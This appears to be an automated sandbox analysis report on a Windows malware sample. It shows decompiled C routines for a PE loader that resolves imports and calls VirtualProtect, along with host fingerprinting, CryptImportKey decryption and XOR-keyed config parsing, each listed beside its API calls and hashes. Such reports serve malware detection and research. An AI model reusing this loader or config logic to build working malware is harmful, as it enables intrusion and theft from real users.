              • Instruction ID: ad62e800e5a6cc352bec1f871f6fc53ae82fcb3059cb70ead7ad73166ac9774f
              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
              • Instruction Fuzzy Hash: 62F062351407116FDB302AB9AC8CFAA76E8BF49628F185568E647914C0DF74E8454A61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 37%
              			E02CE472F(void* __ecx) {
              				signed int _v8;
              				void* _t15;
              				void* _t19;
              				void* _t20;
              				void* _t22;
              				intOrPtr* _t23;
              
              				_t23 = __imp__;
              				_t20 = 0;
              				_v8 = _v8 & 0;
              				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
              				_t10 = _v8;
              				if(_v8 != 0) {
              					_t20 = E02CE33DC(_t10 + 1);
              					if(_t20 != 0) {
              						_t15 =  *_t23(3, _t20,  &_v8); // executed
              						if(_t15 != 0) {
              							 *((char*)(_v8 + _t20)) = 0;
              						} else {
              							E02CE61DA(_t20);
              							_t20 = 0;
              						}
              					}
              				}
              				return _t20;
              			}









              0x02ce4734
              0x02ce473f
              0x02ce4741
              0x02ce4747
              0x02ce4749
              0x02ce474e
              0x02ce4757
              0x02ce475b
              0x02ce4764
              0x02ce4768
              0x02ce4777
              0x02ce476a
              0x02ce476b
              0x02ce4770
              0x02ce4770
              0x02ce4768
              0x02ce475b
              0x02ce4780

              APIs
              • GetComputerNameExA.KERNELBASE(00000003,00000000,02CE3DCD,00000000,00000000,?,775EC740,02CE3DCD), ref: 02CE4747
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • GetComputerNameExA.KERNELBASE(00000003,00000000,02CE3DCD,02CE3DCE,?,775EC740,02CE3DCD), ref: 02CE4764
                • Part of subcall function 02CE61DA: RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: ComputerHeapName$AllocateFree
              • String ID:
              • API String ID: 187446995-0
              • Opcode ID: 4dde3b0e464f7694215b91ac0f33b5d0f81e6fbcab6e950887b67cc5e355c9e9
              • Instruction ID: 61b27cf7039a6b77a5e9c5009e21437fec2c029be57030f7c7bb808e2089facf
              • Opcode Fuzzy Hash: 4dde3b0e464f7694215b91ac0f33b5d0f81e6fbcab6e950887b67cc5e355c9e9
              • Instruction Fuzzy Hash: 0DF0B436A00219FAEF21D6AACC05FAF3ABDDBC5645F500055E906D3140EB70DB02D7B0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE5006(signed int __edx, intOrPtr _a4) {
              				void* _t3;
              				void* _t5;
              				void* _t7;
              				void* _t8;
              				void* _t9;
              				signed int _t10;
              
              				_t10 = __edx;
              				_t3 = HeapCreate(0, 0x400000, 0); // executed
              				 *0x2cea2d8 = _t3;
              				if(_t3 == 0) {
              					_t8 = 8;
              					return _t8;
              				}
              				 *0x2cea1c8 = GetTickCount();
              				_t5 = E02CE54D8(_a4);
              				if(_t5 == 0) {
              					_t5 = E02CE213E(_t9, _a4); // executed
              					if(_t5 == 0) {
              						if(E02CE6392(_t9) != 0) {
              							 *0x2cea300 = 1; // executed
              						}
              						_t7 = E02CE2523(_t10); // executed
              						return _t7;
              					}
              				}
              				return _t5;
              			}









              0x02ce5006
              0x02ce500f
              0x02ce5015
              0x02ce501c
              0x02ce5020
              0x00000000
              0x02ce5020
              0x02ce502d
              0x02ce5032
              0x02ce5039
              0x02ce503f
              0x02ce5046
              0x02ce504f
              0x02ce5051
              0x02ce5051
              0x02ce505b
              0x00000000
              0x02ce505b
              0x02ce5046
              0x02ce5060

              APIs
              • HeapCreate.KERNELBASE(00000000,00400000,00000000,02CE107E,?), ref: 02CE500F
              • GetTickCount.KERNEL32 ref: 02CE5023
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: CountCreateHeapTick
              • String ID:
              • API String ID: 2177101570-0
              • Opcode ID: 7da7af4b9721c2bd1bf9d8b455cc11d7bbac8b2049bcfac826bee01154f722d8
              • Instruction ID: c4e60dfd80f04420f4fbe944edcc3cf84162372ae187de0a17d08acd793fc3e9
              • Opcode Fuzzy Hash: 7da7af4b9721c2bd1bf9d8b455cc11d7bbac8b2049bcfac826bee01154f722d8
              • Instruction Fuzzy Hash: 8BF09231AC0301EEDF612B719D1471535A56F84788FE04925F907E80C1EBB1D620AEE2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 34%
              			E02CE2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
              				intOrPtr _v12;
              				void* _v18;
              				char _v20;
              				intOrPtr _t15;
              				void* _t17;
              				intOrPtr _t19;
              				void* _t23;
              
              				_v20 = 0;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosw");
              				_t15 =  *0x2cea348; // 0x256d5a8
              				_t4 = _t15 + 0x2ceb3e8; // 0x5258990
              				_t20 = _t4;
              				_t6 = _t15 + 0x2ceb174; // 0x650047
              				_t17 = E02CE790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
              				if(_t17 < 0) {
              					_t23 = _t17;
              				} else {
              					_t23 = 8;
              					if(_v20 != _t23) {
              						_t23 = 1;
              					} else {
              						_t19 = E02CE661C(_t20, _v12);
              						if(_t19 != 0) {
              							 *_a16 = _t19;
              							_t23 = 0;
              						}
              						__imp__#6(_v12);
              					}
              				}
              				return _t23;
              			}










              0x02ce2843
              0x02ce284a
              0x02ce284b
              0x02ce284c
              0x02ce284d
              0x02ce2853
              0x02ce2858
              0x02ce2858
              0x02ce2862
              0x02ce2874
              0x02ce287b
              0x02ce28a9
              0x02ce287d
              0x02ce287f
              0x02ce2884
              0x02ce28a6
              0x02ce2886
              0x02ce2889
              0x02ce2890
              0x02ce2895
              0x02ce2897
              0x02ce2897
              0x02ce289c
              0x02ce289c
              0x02ce2884
              0x02ce28b0

              APIs
                • Part of subcall function 02CE790B: SysFreeString.OLEAUT32(?), ref: 02CE79EA
                • Part of subcall function 02CE661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02CE4B72,004F0053,00000000,?), ref: 02CE6625
                • Part of subcall function 02CE661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02CE4B72,004F0053,00000000,?), ref: 02CE664F
                • Part of subcall function 02CE661C: memset.NTDLL ref: 02CE6663
              • SysFreeString.OLEAUT32(00000000), ref: 02CE289C
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: FreeString$lstrlenmemcpymemset
              • String ID:
              • API String ID: 397948122-0
              • Opcode ID: b9a6e51c7666fff82abf7662a62aff647fef78bc4e44a6f0cd3ea3c852ae9a5c
              • Instruction ID: d5a2af837d2054fd468ce02cf214f37bf046b71bd9b2a84d6db0c13bed624dc4
              • Opcode Fuzzy Hash: b9a6e51c7666fff82abf7662a62aff647fef78bc4e44a6f0cd3ea3c852ae9a5c
              • Instruction Fuzzy Hash: 7101B172900219FFDF519FA5CC04AAABBBDFF48354F000525EE16E7060E7719A11C791
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 37%
              			E00401D3C(void* __eax, intOrPtr _a4) {
              
              				 *0x404190 =  *0x404190 & 0x00000000;
              				_push(0);
              				_push(0x40418c);
              				_push(1);
              				_push(_a4);
              				 *0x404188 = 0xc; // executed
              				L00401682(); // executed
              				return __eax;
              			}



              0x00401d3c
              0x00401d43
              0x00401d45
              0x00401d4a
              0x00401d4c
              0x00401d50
              0x00401d5a
              0x00401d5f

              APIs
              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: DescriptorSecurity$ConvertString
              • String ID:
              • API String ID: 3907675253-0
              • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
              • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
              • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
              • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004012E6(long _a4) {
              				void* _t2;
              
              				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
              				return _t2;
              			}




              0x004012f2
              0x004012f8

              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
              • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
              • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
              • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00401BA9(void* _a4) {
              				char _t2;
              
              				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
              				return _t2;
              			}




              0x00401bb5
              0x00401bbb

              APIs
              • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
              • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
              • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
              • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E004012FB(void* __eax) {
              				char _v8;
              				void* _v12;
              				void* __edi;
              				void* _t18;
              				long _t24;
              				long _t26;
              				long _t29;
              				intOrPtr _t40;
              				void* _t41;
              				void* _t42;
              				void* _t44;
              
              				_t41 = __eax;
              				_t16 =  *0x404180;
              				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
              				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
              				if(_t18 != 0) {
              					_t29 = 8;
              					goto L8;
              				} else {
              					_t40 = _v8;
              					_t29 = E00401BC4(_t33, _t40, _t41);
              					if(_t29 == 0) {
              						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
              						_t24 = E00401000(_t40, _t44); // executed
              						_t29 = _t24;
              						if(_t29 == 0) {
              							_t26 = E004014CF(_t44, _t40); // executed
              							_t29 = _t26;
              							if(_t29 == 0) {
              								_push(_t26);
              								_push(1);
              								_push(_t40);
              								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
              									_t29 = GetLastError();
              								}
              							}
              						}
              					}
              					_t42 = _v12;
              					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
              					E00401BA9(_t42);
              					L8:
              					return _t29;
              				}
              			}














              0x00401303
              0x00401305
              0x00401321
              0x00401332
              0x00401339
              0x00401397
              0x00000000
              0x0040133b
              0x0040133b
              0x00401345
              0x00401349
              0x0040134e
              0x00401351
              0x00401356
              0x0040135a
              0x0040135f
              0x00401364
              0x00401368
              0x0040136d
              0x0040136e
              0x00401372
              0x00401377
              0x0040137f
              0x0040137f
              0x00401377
              0x00401368
              0x0040135a
              0x00401381
              0x0040138a
              0x0040138e
              0x00401398
              0x0040139e
              0x0040139e

              APIs
                • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
              • GetLastError.KERNEL32(?,?), ref: 00401379
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
              • String ID:
              • API String ID: 3135819546-0
              • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
              • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
              • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
              • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E4E8A3
              Memory Dump Source
              • Source File: 00000000.00000002.568856386.0000000002E48000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E48000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2e48000_server.jbxd
              Yara matches
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
              • Instruction ID: 3c8f885ac3e57d64adef645a2bb85c909ea8d54064ee931342c95c5afbc8b97a
              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
              • Instruction Fuzzy Hash: 2C112B79A40208EFDB01DF98C985E98BBF5AF08351F19C0A4F9489B361D771EA50DF80
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 75%
              			E02CE5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
              				void* _t13;
              				void* _t21;
              
              				_t11 =  &_a4;
              				_t21 = 0;
              				__imp__( &_a8);
              				_t13 = E02CE1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
              				if(_t13 == 0) {
              					_t21 = E02CE33DC(_a8 + _a8);
              					if(_t21 != 0) {
              						E02CE22EA(_a4, _t21, _t23);
              					}
              					E02CE61DA(_a4);
              				}
              				return _t21;
              			}





              0x02ce506b
              0x02ce5072
              0x02ce5074
              0x02ce5083
              0x02ce508a
              0x02ce5099
              0x02ce509d
              0x02ce50a4
              0x02ce50a4
              0x02ce50ac
              0x02ce50b1
              0x02ce50b6

              APIs
              • lstrlen.KERNEL32(00000000,00000000,02CE3ECE,00000000,?,02CE66D9,00000000,02CE3ECE,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE5074
                • Part of subcall function 02CE1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02CE5088,00000001,02CE3ECE,00000000), ref: 02CE1540
                • Part of subcall function 02CE1508: memcpy.NTDLL(02CE5088,02CE3ECE,00000010,?,?,?,02CE5088,00000001,02CE3ECE,00000000,?,02CE66D9,00000000,02CE3ECE,?,775EC740), ref: 02CE1559
                • Part of subcall function 02CE1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02CE1582
                • Part of subcall function 02CE1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02CE159A
                • Part of subcall function 02CE1508: memcpy.NTDLL(00000000,775EC740,05259600,00000010), ref: 02CE15EC
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
              • String ID:
              • API String ID: 894908221-0
              • Opcode ID: b8ff95a169d8b58f60bd5b31cc1ff2e297d2a5de868c45f0b8ddc31b971d632a
              • Instruction ID: 6bdaa8c2e37a207eddf05a256ef9cec3312f9964c86961d79b029e3f7c9fa4a3
              • Opcode Fuzzy Hash: b8ff95a169d8b58f60bd5b31cc1ff2e297d2a5de868c45f0b8ddc31b971d632a
              • Instruction Fuzzy Hash: AFF0F476501109BBDF126F55DC40DDA3B6EEF853A5B408012FD1ECA110DB71D655ABE0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E02CE1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
              				int _v8;
              				void* _v12;
              				void* _v16;
              				signed int _t28;
              				signed int _t33;
              				signed int _t39;
              				char* _t45;
              				char* _t46;
              				char* _t47;
              				char* _t48;
              				char* _t49;
              				char* _t50;
              				void* _t51;
              				void* _t52;
              				void* _t53;
              				intOrPtr _t54;
              				void* _t56;
              				intOrPtr _t57;
              				intOrPtr _t58;
              				signed int _t61;
              				intOrPtr _t64;
              				signed int _t65;
              				signed int _t70;
              				void* _t72;
              				void* _t73;
              				signed int _t75;
              				signed int _t78;
              				signed int _t82;
              				signed int _t86;
              				signed int _t90;
              				signed int _t94;
              				signed int _t98;
              				void* _t101;
              				void* _t102;
              				void* _t116;
              				void* _t119;
              				intOrPtr _t122;
              
              				_t119 = __esi;
              				_t116 = __edi;
              				_t104 = __ecx;
              				_t101 = __ebx;
              				_t28 =  *0x2cea344; // 0x43175ac3
              				if(E02CE10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
              					 *0x2cea374 = _v8;
              				}
              				_t33 =  *0x2cea344; // 0x43175ac3
              				if(E02CE10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
              					_v12 = 2;
              					L69:
              					return _v12;
              				}
              				_t39 =  *0x2cea344; // 0x43175ac3
              				_push(_t116);
              				if(E02CE10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
              					L67:
              					HeapFree( *0x2cea2d8, 0, _v16);
              					goto L69;
              				} else {
              					_push(_t101);
              					_t102 = _v12;
              					if(_t102 == 0) {
              						_t45 = 0;
              					} else {
              						_t98 =  *0x2cea344; // 0x43175ac3
              						_t45 = E02CE36C5(_t104, _t102, _t98 ^ 0x523046bc);
              					}
              					_push(_t119);
              					if(_t45 != 0) {
              						_t104 =  &_v8;
              						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
              							 *0x2cea2e0 = _v8;
              						}
              					}
              					if(_t102 == 0) {
              						_t46 = 0;
              					} else {
              						_t94 =  *0x2cea344; // 0x43175ac3
              						_t46 = E02CE36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
              					}
              					if(_t46 != 0) {
              						_t104 =  &_v8;
              						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
              							 *0x2cea2e4 = _v8;
              						}
              					}
              					if(_t102 == 0) {
              						_t47 = 0;
              					} else {
              						_t90 =  *0x2cea344; // 0x43175ac3
              						_t47 = E02CE36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
              					}
              					if(_t47 != 0) {
              						_t104 =  &_v8;
              						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
              							 *0x2cea2e8 = _v8;
              						}
              					}
              					if(_t102 == 0) {
              						_t48 = 0;
              					} else {
              						_t86 =  *0x2cea344; // 0x43175ac3
              						_t48 = E02CE36C5(_t104, _t102, _t86 ^ 0x267c2349);
              					}
              					if(_t48 != 0) {
              						_t104 =  &_v8;
              						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
              							 *0x2cea004 = _v8;
              						}
              					}
              					if(_t102 == 0) {
              						_t49 = 0;
              					} else {
              						_t82 =  *0x2cea344; // 0x43175ac3
              						_t49 = E02CE36C5(_t104, _t102, _t82 ^ 0x167db74c);
              					}
              					if(_t49 != 0) {
              						_t104 =  &_v8;
              						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
              							 *0x2cea02c = _v8;
              						}
              					}
              					if(_t102 == 0) {
              						_t50 = 0;
              					} else {
              						_t78 =  *0x2cea344; // 0x43175ac3
              						_t50 = E02CE36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
              					}
              					if(_t50 == 0) {
              						L41:
              						 *0x2cea2ec = 5;
              						goto L42;
              					} else {
              						_t104 =  &_v8;
              						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
              							goto L41;
              						} else {
              							L42:
              							if(_t102 == 0) {
              								_t51 = 0;
              							} else {
              								_t75 =  *0x2cea344; // 0x43175ac3
              								_t51 = E02CE36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
              							}
              							if(_t51 != 0) {
              								_push(_t51);
              								_t72 = 0x10;
              								_t73 = E02CE5B85(_t72);
              								if(_t73 != 0) {
              									_push(_t73);
              									E02CE607C();
              								}
              							}
              							if(_t102 == 0) {
              								_t52 = 0;
              							} else {
              								_t70 =  *0x2cea344; // 0x43175ac3
              								_t52 = E02CE36C5(_t104, _t102, _t70 ^ 0x93710135);
              							}
              							if(_t52 != 0 && E02CE5B85(0, _t52) != 0) {
              								_t122 =  *0x2cea3cc; // 0x5259600
              								E02CE5364(_t122 + 4, _t68);
              							}
              							if(_t102 == 0) {
              								_t53 = 0;
              							} else {
              								_t65 =  *0x2cea344; // 0x43175ac3
              								_t53 = E02CE36C5(_t104, _t102, _t65 ^ 0x175474b7);
              							}
              							if(_t53 == 0) {
              								L59:
              								_t54 =  *0x2cea348; // 0x256d5a8
              								_t22 = _t54 + 0x2ceb5f3; // 0x616d692f
              								 *0x2cea370 = _t22;
              								goto L60;
              							} else {
              								_t64 = E02CE5B85(0, _t53);
              								 *0x2cea370 = _t64;
              								if(_t64 != 0) {
              									L60:
              									if(_t102 == 0) {
              										_t56 = 0;
              									} else {
              										_t61 =  *0x2cea344; // 0x43175ac3
              										_t56 = E02CE36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
              									}
              									if(_t56 == 0) {
              										_t57 =  *0x2cea348; // 0x256d5a8
              										_t23 = _t57 + 0x2ceb899; // 0x6976612e
              										_t58 = _t23;
              									} else {
              										_t58 = E02CE5B85(0, _t56);
              									}
              									 *0x2cea3e0 = _t58;
              									HeapFree( *0x2cea2d8, 0, _t102);
              									_v12 = 0;
              									goto L67;
              								}
              								goto L59;
              							}
              						}
              					}
              				}
              			}








































              0x02ce1d8a
              0x02ce1d8a
              0x02ce1d8a
              0x02ce1d8a
              0x02ce1d8d
              0x02ce1daa
              0x02ce1db8
              0x02ce1db8
              0x02ce1dbd
              0x02ce1dd7
              0x02ce2045
              0x02ce204c
              0x02ce2050
              0x02ce2050
              0x02ce1ddd
              0x02ce1de2
              0x02ce1dfa
              0x02ce2032
              0x02ce203c
              0x00000000
              0x02ce1e00
              0x02ce1e00
              0x02ce1e01
              0x02ce1e06
              0x02ce1e1c
              0x02ce1e08
              0x02ce1e08
              0x02ce1e15
              0x02ce1e15
              0x02ce1e1e
              0x02ce1e27
              0x02ce1e29
              0x02ce1e33
              0x02ce1e38
              0x02ce1e38
              0x02ce1e33
              0x02ce1e3f
              0x02ce1e55
              0x02ce1e41
              0x02ce1e41
              0x02ce1e4e
              0x02ce1e4e
              0x02ce1e59
              0x02ce1e5b
              0x02ce1e65
              0x02ce1e6a
              0x02ce1e6a
              0x02ce1e65
              0x02ce1e71
              0x02ce1e87
              0x02ce1e73
              0x02ce1e73
              0x02ce1e80
              0x02ce1e80
              0x02ce1e8b
              0x02ce1e8d
              0x02ce1e97
              0x02ce1e9c
              0x02ce1e9c
              0x02ce1e97
              0x02ce1ea3
              0x02ce1eb9
              0x02ce1ea5
              0x02ce1ea5
              0x02ce1eb2
              0x02ce1eb2
              0x02ce1ebd
              0x02ce1ebf
              0x02ce1ec9
              0x02ce1ece
              0x02ce1ece
              0x02ce1ec9
              0x02ce1ed5
              0x02ce1eeb
